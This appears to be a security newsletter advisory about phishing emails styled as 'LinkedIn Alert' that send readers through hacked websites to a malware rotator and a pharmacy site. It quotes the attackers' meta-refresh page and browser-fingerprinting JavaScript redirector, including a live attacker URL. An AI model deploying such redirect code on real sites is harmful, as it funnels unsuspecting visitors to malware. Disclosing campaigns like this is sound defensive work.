Email messages with subject "LinkedIn Alert" lead to malware
An certain amount of emails with the subject “LinkedIn Alert" were intercepted, it leads to a website with malicious software and redirects surfers to a online pharmacy web site.
The email has he branding of LinkedIn done quite well, so it looks quite well. All the URLs have been modified to direct the reader to a first web site. In this case we had hxxp://portalgamm.com.br/1.html but the domains change quite rapidly. When visiting this web site we got the following HTML code: PLEASE WAITING.... 4 SECONDS <meta http-equiv="refresh" content="4;url=hxxp://medicineni.com" /> The website borlakas.info contains the following Javascript:
<script>
if (navigator.javaEnabled()) {
var metka = '2';
}
location.href = ('http://borlakas.info/asdfasgs/rotator.php?unique='
+ metka + '');
if (!frames.navigator['taintE' + 'nabled']()) {
var metka = '1';
}
location.href = ('http://borlakas.info/asdfasgs/rotator.php?unique='
+ metka + '');
</script>
<script> if (navigator.javaEnabled()) { var metka = '2'; }
location.href = ('http://borlakas.info/asdfasgs/rotator.php?unique='
+ metka + '');if (!frames.navigator['taintE' + 'nabled']()) { var metka = '1'; }
location.href = ('http://borlakas.info/asdfasgs/rotator.php?unique=' + metka + '');
</script>
After 4 seconds you are redirected to an online pharmacy web site
During our anaylis of some messages we could notice that the authors of this campaign use valid domains of real company web sites. We found an URL to a political party in Belgium: Vlaams Belang. So it seems that someone got access to drop the file 1.html on the server of Vlaams Belang. The URL is hxxp://www.vlaamsbelang.org/1.html and the visitor is redirected to hxxp://www.vlaamsbelang.org/1.html. We did made an effort to contact Vlaams Belang to notify them of the exploit on their web site but it is clear that several other web sites are also affected. 3. AppendixFor more information, please visit http://www.ids-sax2.com/ComputerSecurityNewsletter.htm |
